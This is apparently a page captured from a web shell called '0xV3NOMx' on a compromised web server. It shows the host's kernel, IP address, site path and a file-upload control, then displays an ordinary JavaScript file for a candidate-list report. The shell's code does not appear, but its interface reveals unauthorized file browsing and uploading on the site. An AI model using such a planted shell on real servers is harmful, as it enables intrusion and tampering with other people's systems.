0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.145.84.128


Current Path : /var/www/html/nitte/js21042016/Report/
Upload File :
Current File : /var/www/html/nitte/js21042016/Report/report_candidate_list.js

/* 
 * CANDIDATE LIST PRINTING
 * PROGRAMED BY NAVEEN
 * DATE: 16/04/09
 * TIME: 10:15 AM 
  *
 */
function  LoadCandidateListPrinting()
{
  $("#page_main_div").load('html_modules/candidate_list_printing.html',function()
	{
 
	document.getElementById('display_module_name').innerHTML = 'Candidate List Report';
	document.getElementById('module_name_for_save').value = 'ReportCandidateList';		
	getDefaultHeadFooterLinks("Candidate List Printing"); 
	$("#report_cl_degree_code").val('');		
	$("#report_degree_name").val('');
    $("#report_cl_regno_start_from").val();	
	 
	}
	);
 		
}

function GenerateCandidateListReport()
{
 if(trim($("#report_cl_degree_code").val()) == '')
	{
		alert('Please Enter Degree Code!!');
		$("#report_cl_degree_code").focus();
		return;
	}
	
 if(document.getElementById("report_cl_subcode").checked)
  {
	$search_field = 'sub.FSUBCODE';
	
  }
   if(document.getElementById("report_cl_shortname").checked)
  {
	$search_field = 'sub.FSUBSHORT';
	
  }
	window.location.href = $host_url+"generateCandidateListReport.demo&degree_code="+trim(($("#report_cl_degree_code").val()))+"&streg="+trim(($("#report_cl_regno_start_from").val()))+"&edreg="+trim(($("#report_cl_regno_end_to").val()))+"&search_field="+$search_field ; 
}